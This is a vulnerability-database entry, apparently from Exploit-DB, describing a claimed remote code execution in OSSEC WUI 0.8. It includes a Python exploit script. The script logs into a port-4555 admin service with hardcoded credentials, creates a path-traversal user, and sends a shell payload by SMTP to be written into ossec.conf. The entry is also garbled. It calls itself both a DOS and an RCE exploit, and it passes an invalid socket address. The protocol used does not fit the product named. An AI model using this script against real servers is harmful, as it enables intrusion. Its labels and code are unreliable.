[OSSEC]

vendor:

OSSEC Manager

by:

Milad Saber

7.5

CVSS

HIGH

Remote Code Execution

CWE

Product Name: OSSEC Manager

Affected Version From: 0.8

Affected Version To: 0.8

Patch Exists: YES

Related CWE: N/A

CPE: a:ossec:ossec_manager

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: OSSEC Manager

2015

This exploit allows an attacker to execute arbitrary code on an OSSEC server by sending a malicious payload via SMTP. The payload is sent to the server, which then executes it as root.

Mitigation:

Ensure that the OSSEC server is running the latest version and that all patches are up to date.

Source

Exploit-DB raw data:

###########################################################
# Exploit Title: [OSSEC]
# Date: [2015-08-01]
# Exploit Author: [Milad Saber]
# Vendor Homepage: [www.ossec.net]
# Software Link: [www.ossec.net/files/ossec-wui-0.8.tar.gz]
# Version: [0.8]
# Tested on: [OSSEC Manager]
# Exploit for DOS ossec server.
# Please install ossec server and WUI 0.8 and run this exploit
##########################################################
import socket
import sys
import time
 
# specify payload
payload = '[ "$(id -u)" == "0" ] && touch /var/ossec/ossec.conf' # to exploit only on root
user = 'root'
pwd = 'var'
 
if len(sys.argv) != 2:
    sys.stderr.write("[-]Usage: python %s <ip>\ossec-wui-0.8" % sys.argv[0])
    sys.stderr.write("[-]Exemple: python %s 127.0.0.1\ossec-wui-0.8" % sys.argv[0])
    sys.exit(1)
 
ip = sys.argv[1]
 
def recv(s):
        s.recv(1024)
        time.sleep(0.2)
 
try:
    print "[+]Connecting to milad exploit ..."
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((ip,4555))
    s.recv(1024)
    s.send(user + "\n")
    s.recv(1024)
    s.send(pwd + "\n")
    s.recv(1024)
    print "[+]Creating user..."
    s.send("adduser ../../../../../../../../var/ossec/ossec.conf exploit\n")
    s.recv(1024)
    s.send("quit\n")
    s.close()
 
    print "[+]Connecting to SMTP server..."
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((ip,25,80))
    s.send("hello milad@milad.pl\r\n")
    recv(s)
    print "[+]Sending payload..."
    s.send("mail from: <'@milad.pl>\r\n")
    recv(s)
    # also try s.send("rcpt to: <../../../../../../../../var/ossec/ossec.conf/r\n") if the recipient cannot be found
    s.send("rcpt to: <../../../../../../../../var/ossec/ossec.conf\r\n")
    recv(s)
    s.send("data\r\n")
    recv(s)
    s.send("From: milad@milad.pl\r\n")
    s.send("\r\n")
    s.send("'\n")
    s.send(payload + "\n")
    s.send("\r\n.\r\n")
    recv(s)
    s.send("quit\r\n")
    recv(s)
    s.close()
    print "[+]Done! Payload will be executed once somebody logs in."
except:
    print "Connection failed."